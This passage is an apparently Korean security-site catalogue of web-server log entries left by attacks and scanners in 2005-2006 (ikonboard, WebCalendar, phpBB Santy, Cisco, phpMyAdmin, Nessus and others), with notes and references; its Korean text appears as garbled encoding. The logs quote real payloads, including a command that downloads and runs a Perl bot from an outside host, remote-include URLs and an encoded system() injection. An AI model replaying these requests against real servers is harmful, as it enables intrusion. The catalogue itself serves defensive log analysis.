10. ikonBooard Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý
211.217.xx.xx - - [22/Feb/2006:08:06:25 +0900] "GET /cgi-bin/ikonboard/ikonboard.cgi?dir=http://www.members.lycos.co.uk/botperl/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20www.members.lycos.co.uk/botperl/botperl;perl%20botperl HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
- IP : ±¹³»(³Ø½ºÆ®ÀÎÆ÷¸ÞÀ̼Ç, 211.217.75.26-211.217.75.26)
11. WebCalendarÀÇ send_reminders.php Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý
65.203.xxx.xxx - - [05/Dec/2005:02:34:23 +0900] "GET /webcalendar/tools/send_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
65.203.xxx.xxx - - [05/Dec/2005:02:34:27 +0900] "GET /cacti/include/config_settings.php?config[include_path]=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
65.203.xxx.xxx - - [05/Dec/2005:02:34:29 +0900] "GET /calendar/tools/send_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
65.203.xxx.xxx - - [05/Dec/2005:02:34:29 +0900] "GET /webcalendar/ws/get_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
65.203.xxx.xxx - - [05/Dec/2005:02:34:31 +0900] "GET /WebCalendar/ws/get_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
65.203.xxx.xxx - - [05/Dec/2005:02:34:32 +0900] "GET /calendar/ws/get_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
216.180.xxx.xx - - [22/Feb/2006:21:31:27 +0900] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.180.xxx.xx - - [22/Feb/2006:21:31:27 +0900] "GET /WebCalendar/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.180.xxx.xx - - [22/Feb/2006:21:31:27 +0900] "GET /webcalendar/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.180.xxx.xx - - [22/Feb/2006:21:31:28 +0900] "GET /cal/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.180.xxx.xx - - [22/Feb/2006:21:31:28 +0900] "GET /Calendar/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.180.xxx.xx - - [22/Feb/2006:21:31:29 +0900] "GET /calendar/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
- IP : UUNET(65.203.134.96 - 65.203.134.111)
¹Ì±¹(US, 216.180.224.0 - 216.180.255.255)
- WebCalendar 1.0.1 º¸´Ù ³·Àº ¹öÀüÀº send_reminders.php¿¡ ¿ø°ÝÁöÀÇ ÆÄÀÏÀ» includeÇÒ ¼ö ÀÖ´Â Ãë¾àÁ¡ÀÌ Á¸ÀçÇÑ´Ù.
Âü°í ÀÚ·á :
* WebCalendar Send_Reminders.PHP Remote File Include Vulnerability
http://www.securityfocus.com/bid/14651
12. RRDtool ±â¹ÝÀÇ Æ®·¡ÇÈ ºÐ¼®Åø CactiÀÇ graph_image.php Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý
66.14.xxx.xx - - [01/Dec/2005:01:03:22 +0900] "GET /cacti/graph_image.php HTTP/1.1" 404 0
216.127.xx.xxx - - [23/Dec/2005:19:57:31 +0900] "GET /cacti/graph_image.php HTTP/1.1" 404 0
208.171.xxx.xxx - - [24/Dec/2005:02:13:41 +0900] "GET /cacti/graph_image.php HTTP/1.1" 404 0
- IP : ¹Ì±¹(US, 216.127.64.0 - 216.127.95.255)
¹Ì±¹(US, 208.169.96.0 - 208.173.191.255)
Âü°í ÀÚ·á :
* RaXnet Cacti Graph_Image.PHP Remote Command Execution Vulnerability
http://www.securityfocus.com/bid/14042/
13. ATD OpenSSL Ãë¾àÁ¡ ½ºÄ³´× Åø¿¡ ÀÇÇÑ ·Î±×
11.53.xxx.x - - [01/Dec/2005:00:49:31 +0900] "GET /sumthin HTTP/1.0" 404 0
- IP : ¹Ì±¹(US, 11.0.0.0 - 11.255.255.255)
Âü°í ÀÚ·á :
* Analysis of the ATD OpenSSL Mass Exploiter
http://www.lurhq.com/atd.html
* ATD OpenSSL Mass Exploiter Analysis (another "/sumthin" scan tool)
http://seclists.org/lists/incidents/2003/Apr/0059.html
* /sumthin Solved
http://www.webmasterworld.com/forum11/2100.htm
http://www.webmasterworld.com/forum39/782.htm
14. Cisco SwitchÀÇ ¾ÆÁÖ ¿¹Àü HTTP Ãë¾àÁ¡(2001³â)À» ÀÌ¿ëÇÑ °ø°Ý
211.115.xxx.xx - - [27/Feb/2006:13:39:22 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 0 "-"
211.115.xxx.xx - - [27/Feb/2006:14:07:16 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 0 "-"
211.115.xxx.xx - - [27/Feb/2006:14:22:24 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 0 "-"
211.115.xxx.xx - - [27/Feb/2006:14:42:59 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 0 "-"
211.115.xxx.xx - - [27/Feb/2006:15:32:15 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 0 "-"
- IP : ±¹³»(CATV »ç¿ëÀÚ, 211.115.224.0-211.115.255.255)
- cisco scanner ¶ó´Â ÀÚµ¿ÈµÈ ½ºÄ³´× ÅøÀÌ ÀÖ´Ù.
Âü°í ÀÚ·á :
* Cisco Security Advisory: IOS HTTP Authorization Vulnerability
http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html
* Old Cisco exploit tries to make a return:
http://isc.sans.org/diary.php?storyid=1104
* Multi-thread Cisco HTTP vulnerable scanner
http://wayreth.eu.org/cisco_scanner.c
15. ÇÁ¶ô½Ã ¼¹ö·Î È°¿ëÇϱâ À§ÇÑ ¿äû
220.137.xx.xxx - - [12/Dec/2005:05:07:19 +0900] "CONNECT msa-mx6.hinet.net:25 HTTP/1.0" 405 231
220.137.xx.xxx - - [12/Dec/2005:05:11:49 +0900] "CONNECT msa-mx6.hinet.net:25 HTTP/1.0" 405 231
61.228.xxx.xxx - - [30/Jan/2006:10:42:28 +0900] "CONNECT msa-mx8.hinet.net:25 HTTP/1.0" 405 231 "-"
- IP : ´ë¸¸ (TW, 220.137.0.0/16)
´ë¸¸ (TW, 61.228.0.0/14)
- HTTPÀÇ COONECT method¸¦ ÅëÇØ ÇÁ¶ô½Ã ¿äûÀ» ÇÑ °ÍÀÌ´Ù. CONNECT msa-mx6.hinet.net:25 ¿äûÀº
ÀÌ À¥¼¹ö¸¦ °æÀ¯ÇÏ¿© msa-mx8.hinet.net ¼¹öÀÇ 25¹ø Æ÷Æ®(SMTP)·Î Á¢¼ÓÇÑ ÈÄ ½ºÆÔ ¸ÞÀÏÀ» ¹ß¼ÛÇÏ·Á´Â
°ÍÀÌ´Ù. msa-mx8.hinet.net ¸ÞÀÏ ¼¹ö ÀÔÀå¿¡¼´Â ½ºÆÔ ¹ß¼ÛÁö IP°¡ À¥¼¹ö°¡ µÇ¹Ç·Î, ½ºÆÔ ¹ß¼ÛÀÚÀÇ
À§Ä¡°¡ ¼û°ÜÁö´Â ¹®Á¦°¡ ÀÖ´Ù.
- À§¿¡¼ »óÅÂÄÚµå 405´Â CONNECT method »ç¿ëÀ» Çã¿ëÇÏÁö ¾Ê¾ÒÀ½À» ÀǹÌÇϸç, 200 ÄÚµå¶ó¸é À¥¼¹öÀÇ
80Æ÷Æ®·Î Á¢¼Ó ÈÄ °á°ú¸¦ È®ÀÎÇغÁ¾ß ÇÑ´Ù. °á°ú°¡ À¥ÆäÀÌÁö ³»¿ëÀÌ ¾Æ´Ï¸é Çã¿ëµÈ °ÍÀÏ ¼ö ÀÖÀ¸´Ï
À¥¼¹ö ¼³Á¤¿¡¼ CONNECT method »ç¿ëÀ» Á¦ÇÑÇϱ⠹ٶõ´Ù.
$ telnet 123.123.123.123 80
Trying 123.123.123.123...
Connected to ????.???.??? (123.123.123.123).
Escape character is '^]'.
CONNECT xxx.xxx.xxx.xxx:25 HTTP/1.0
.. °á°ú »ý·« ...
Âü°íÀÚ·á :
* Proxy ¼¹ö¸¦ °æÀ¯ÇÑ ½ºÆÔ¸ÞÀÏ ¹ß¼Û
http://linux4you.co.kr/bbs/view.php?id=lbd05&no=76
* Re: Strange apache logs: CONNECT
http://seclists.org/lists/incidents/2002/Nov/0131.html
* HTTP/1.1 Method Definitions
http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html
16. MicrosoftÀÇ FrontPage Server ExtensionsÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý
85.224.xxx.xx - - [01/Dec/2005:00:33:20 +0900] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 0
85.224.xxx.xx - - [01/Dec/2005:00:35:04 +0900] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 0
85.224.xxx.xx - - [01/Dec/2005:00:43:42 +0900] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 0
- IP : ³×´ú¶õµå(NL, 85.0.0.0 - 85.255.255.255)
Âü°íÀÚ·á :
* CVE-2001-0341
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2001-0341
* Microsoft FrontPage Server Extensions Buffer Overflow (fp30reg.dll)
http://www.securiteam.com/exploits/6A00J1P8UQ.html
17. phpBBÀÇ viewtopic.php Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý
130.63.xxx.xxx - - [23/Feb/2006:23:26:52 +0900] "GET /bbs/viewtopic.php?t=1112&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 302 642 "-" "Mozilla/4.0"
60.248.xxx.xxx - - [23/Feb/2006:23:43:43 +0900] "GET /bbs/viewtopic.php?p=2113&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 302 642 "-" "Mozilla/4.0"
- IP : ij³ª´Ù(CA, 130.63.0.0 - 130.63.255.255)
´ë¸¸(TW, 60.248.0.0 - 60.248.255.255)
- phpBBÀÇ 2.0.11 ÀÌÀü ¹öÀüÀº viewtopic.phpÀÇ highlight= ·Î ³Ñ¾î¿À´Â °ªÀ» urldecode() ÇÔ¼ö¸¦ »ç¿ëÇؼ
ó¸®ÇÏ¿© º¸¾È»óÀÇ ¹®Á¦°¡ ÀÖ´Ù. ÀÌ Ãë¾àÁ¡À¸·Î ÀÎÇØ ¿ÜºÎ °ø°ÝÀÚ´Â ¿øÇÏ´Â ¸í·ÉÀ» ½ÇÇàÇÒ ¼ö ÀÖ´Ù.
À̸¦ ÀÚµ¿ÈÇÑ ¿úÀÎ Santy ¿úÀÌ 2004³â ¸»ºÎÅÍ ±Þ¼ÓÈ÷ ÆÛÁ³À¸¸ç, ¾ÆÁ÷µµ ÀÌ·¯ÇÑ °ø°ÝÀº °è¼ÓµÇ°í ÀÖ´Ù.
Âü°íÀÚ·á :
* ¾ÆÆÄÄ¡¿¡¼ phpBB¿ú Â÷´Ü ¹× º°µµ ·Î±× ÀúÀå (±Û ÁÁÀºÁøÈ£, 2005.2)
http://coffeenix.net/board_print.php?bd_code=742
* Database passwords is open. Passthru() is available. [Highlight Vulnerability]
http://www.phpbb.com/security/final_reports.php?p=1
18. phpMyAdminÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý
81.5.xxx.xxx - - [17/Mar/2006:12:12:57 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:12:57 +0900] "GET /PMA/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:12:58 +0900] "GET /mysql/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:12:58 +0900] "GET /admin/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:12:58 +0900] "GET /db/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:12:59 +0900] "GET /dbadmin/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:12:59 +0900] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:12:59 +0900] "GET /admin/pma/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:00 +0900] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:00 +0900] "GET /admin/mysql/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:01 +0900] "GET /mysql-admin/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:01 +0900] "GET /phpmyadmin2/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:01 +0900] "GET /mysqladmin/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:01 +0900] "GET /mysql-admin/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:02 +0900] "GET /main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:02 +0900] "GET /phpMyAdmin-2.5.6/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:03 +0900] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:03 +0900] "GET /phpMyAdmin-2.5.1/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:03 +0900] "GET /phpMyAdmin-2.2.3/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:03 +0900] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 0 "PMAFind"
81.5.xxx.xxx - - [17/Mar/2006:12:13:04 +0900] "GET /myadmin/main.php HTTP/1.0" 404 0 "PMAFind"
- IP : ¿µ±¹ (GB=UK, 81.5.128.0 - 81.5.191.255)
- PMAFind´Â PHPMyAdmin-WebinterfacesÀÇ Ãë¾àÁ¡À» ã±âÀ§ÇØ µ¶ÀÏÀο¡ ÀÇÇØ ¸¸µé¾îÁø À©µµ¿ì¿ë ÅøÀÌ´Ù.
IP´ë¿ªÀ» ÁöÁ¤ÇÒ ¼öµµ ÀÖ°í, IP¸ñ·ÏÀ» ÆÄÀÏ·Î ÀúÀåÇÏ¿© ´ë·®À¸·Î ½ºÄ³´×ÇÒ ¼ö ÀÖ´Â ¼öµµ ÀÖ´Ù.
Âü°íÀÚ·á :
* Pmafind.exe, PHPMyAdmin-Scanner
http://www.governmentsecurity.org/forum/index.php?showtopic=17244
* Multiple XSS Vulnerabilities in phpMyAdmin 2.6.0-pl2 and prior (2004.11)
http://www.netvigilance.com/html/advisory0005.htm
* phpMyAdmin Multiple Remote Vulnerabilities (2004.12)
http://www.securityfocus.com/bid/11886
* phpMyAdmin Remote Command Execution Vulnerability (2004.10)
http://www.securityfocus.com/bid/11391
19. ±¹³» Ç÷£Æ¼³Ý À¥·Îº¿¿¡ ÀÇÇØ ³²Àº ·Î±×
218.232.120.xx - - [20/Jan/2006:12:16:11 +0900] "GET /robotsxx.txt HTTP/1.0" 404 0 "PlantyNet_WebRobot_V1.9 dhkang@plantynet.com"
218.232.120.xx - - [26/Jan/2006:20:48:54 +0900] "GET /robotsxx.txt HTTP/1.0" 404 0 "PlantyNet_WebRobot_V1.9 dhkang@plantynet.com"
- IP : ±¹³»(Ç÷£Æ¼³Ý, 218.232.120.0-218.232.120.127)
- À¯ÇØ»çÀÌÆ®Â÷´Ü¼ºñ½º¸¦ Á¦°øÇÏ´Â Ç÷£Æ¼³Ý À¥·Îº¿ÀÌ robots.txtÀÌ ¾Æ´Ñ robotsxx.txt¸¦ ã´ÂÁö???
Ç÷£Æ¼³Ý ¾÷ü¿¡ ÀÌ »çÇ׿¡ ´ëÇØ ´äº¯À» ¿äûÇßÀ¸³ª ¾ÆÁ÷ ´äÀÌ ¾ø´Ù.
Âü°íÀÚ·á :
* robotsxx.txt¸¦ ã´Â ÀÌ»óÇÑ spider
http://j2k.naver.com/j2k_frame.php/korean/www.tkamiya.net/sd5/archives/000601.html
http://www.tkamiya.net/sd5/archives/000601.html
20. Ãë¾àÁ¡ ½ºÄ³´×ÅøÀÎ Nessus ·Î Ãë¾àÁ¡À» ãÀ» ¶§
61.177.xx.xxx - - [06/Mar/2006:11:14:09 +0900] "GET / HTTP/1.1" 200 12931 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
61.177.xx.xxx - - [06/Mar/2006:11:14:09 +0900] "GET / HTTP/1.1" 200 35988 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
61.177.xx.xxx - - [06/Mar/2006:11:14:10 +0900] "GET /fpFWUpload.html HTTP/1.1" 404 532
"-" "Mozilla/4.75 [en] (X11, U; Nessus)"
61.177.xx.xxx - - [06/Mar/2006:11:14:11 +0900] "GET / HTTP/1.1" 200 35988 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
61.177.xx.xxx - - [06/Mar/2006:11:14:12 +0900] "GET /NessusTest17153.html HTTP/1.1" 404 532 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
61.177.xx.xxx - - [06/Mar/2006:11:14:12 +0900] "GET /foo.jsp?param=<SCRIPT>foo</SCRIPT>.jsp HTTP/1.1" 406 535 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
61.177.xx.xxx - - [06/Mar/2006:11:14:12 +0900] "TRACE /Nessus8348.html HTTP/1.1" 200 288 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
61.177.xx.xxx - - [06/Mar/2006:11:14:13 +0900] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
61.177.xx.xxx - - [06/Mar/2006:11:14:13 +0900] "GET / HTTP/1.1" 200 35988 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
... ÀÌÇÏ »ý·« ...
- IP : Áß±¹(CN, 61.177.0.0 - 61.177.255.255)
- º¸¾È Ãë¾àÁ¡ ½ºÄ³´×ÅøÀÎ Nessus·Î ½ºÄ³´× ¿äûÇßÀ» ¶§ ³²´Â ·Î±×ÀÌ´Ù.
º»ÀÎÀÌ ¿äûÇÑ°Ô ¾Æ´Ï¶ó¸é °ø°Ý´ë»óÀ» ã±âÀ§ÇÑ ½ÃµµÀÌ´Ù.
Âü°íÀÚ·á :
* Vulnerability Scanner Nessus
http://www.nessus.org/
* Nessus ºÐ¼®º¸°í¼
http://www.certcc.or.kr/servlet/download?mode=secu_tools&file=linux_Nessus.pdf
21. º¸¾È ½ºÄ³´×Åø DFind¿¡ ÀÇÇØ ³²Àº ·Î±×
211.202.x.xxx - - [15/Mar/2006:09:54:44 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 335 "-"
211.202.x.xxx - - [15/Mar/2006:09:55:12 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 335 "-"
- ±¹³» (Çϳª·ÎÅÚ·¹ÄÞ ÇÒ´ç IP ´ë¿ª, 211.202.0.0-211.202.3.255)
- À§ ·Î±×´Â Æ÷Æ®½ºÄ³´×ÅøÀÎ DFind °¡ ³²±ä signatureÀÌ´Ù.
DFind´Â Æ÷Æ® ½ºÄ³´×, ping üũ, Ãë¾àÁ¡ ½ºÄ³´×, À¥¼¹ö Á¾·ù Æľǰú ¿øÇÏ´Â HTML ÆÄÀÏÀÌ ÀÖ´ÂÁö ã¾ÆÁÖ´Â
µîÀÇ ±â´ÉÀ» °¡Áø ÅøÀÌ´Ù.
Âü°íÀÚ·á :
* w00tw00t.at.ISC.SANS.DFind
http://www.atlink.it/~conti/2006/03/04/w00tw00tatiscsansdfind-update/
* w00tw00t
http://isc.sans.org/diary.php?storyid=900
http://isc.sans.org/diary.php?storyid=591
* DFind
http://class101.org
Ä¿ÇǴнº Ä«Æä ÃÖ±Ù ±Û
[03/24]
Youtube òÁ
[03/20]
Re: ¿Â¶óÀΰÔÀÓÀÇ Á¾ÁÖ±¹ ´ëÇѹα¹
[03/20]
½ÇÁ¦
[03/18]
±¹°¡
[10/20]
Cross Compiler ±ò
[07/14]
SSL ¬¡¬°
[04/26]
Re: µµ½ºÈ¸é ¿ø°ÝÁ¶Á¾ ¿©ºÎ
[04/25]
µµ½ºÈ¸é ¿ø°ÝÁ¶Á¾ ¿©ºÎ
[10/30]
Cshell¿¡¼ ³¼ö ¼³Á¤
[10/23]
°øÇ×öµµÁÖ½Äȸ»ç SE ±¸ÀÎ Ëì
[01/26]
Re: wgetÀ¸·Î ´Ù¸¥¼¹ö¿¡ÀÖ´Â µð·ºÅ丮¸¦ °¡Á®¿À·Á°íÇÕ´Ï´Ù.
[01/25]
wgetÀ¸·Î ´Ù¸¥¼¹ö¿¡ÀÖ´Â µð·ºÅ丮¸¦ °¡Á®¿À·Á°íÇÕ´Ï´Ù.
[01/11]
ƯÁ¤ ¾Èµå·ÎÀ̵å WebView ¹öÀü¿¡¼ SSL ¹®Á¦ (WebView ¹ö±×)
[08/01]
DNS forwarder (Àü´ÞÀÚ) ¼¹ö¸¦ ÅëÇؼ Äõ¸®ÇÏ¸é ¿ª¹æÇâÀ» ¹Þ¾Æ¿ÀÁú ¸øÇÕ´Ï´Ù.
[05/16]
(ÁÖ)ÈÄÀÌÁî ½Ã½ºÅÛ¿£Áö´Ï¾î (°æ·ÂÀÚ) ¸ðÁý
N
e
w
! ÃÖ±Ù¿¡ µî·ÏÇÑ ÆäÀÌÁö
KiCad EDA Suite project (Free/Libre/Open-Source EDA Suite) (CAD)
¿ÀÇÂij½ºÄÉÀ̵å ijµå (OpenCASCADE CAD)
QCad for Windows --- GNU GPL (Free Software)
The Hello World Collection
IPMI¸¦ È°¿ëÇÑ ¸®´ª½º ¼¹ö°ü¸®
DNS ¼³Á¤ °Ë»ç
nagiosgraph ¼³Ä¡ ¹æ¹ý
Slony-I ¼³Ä¡ ¹æ¹ý (postgresql replication tool)
Qmail±â¹ÝÀÇ Anti spam ½Ã½ºÅÛ ±¸ÃàÇϱâ
clusterssh
[ ÇÔ²²ÇÏ´Â »çÀÌÆ® ]
¿î¿µÁø :
ÁÁÀºÁøÈ£(truefeel)
, ¾ß¼ö(yasu), ¹ü³ÃÀÌ, sCag
2003³â 8¿ù 4ÀÏ~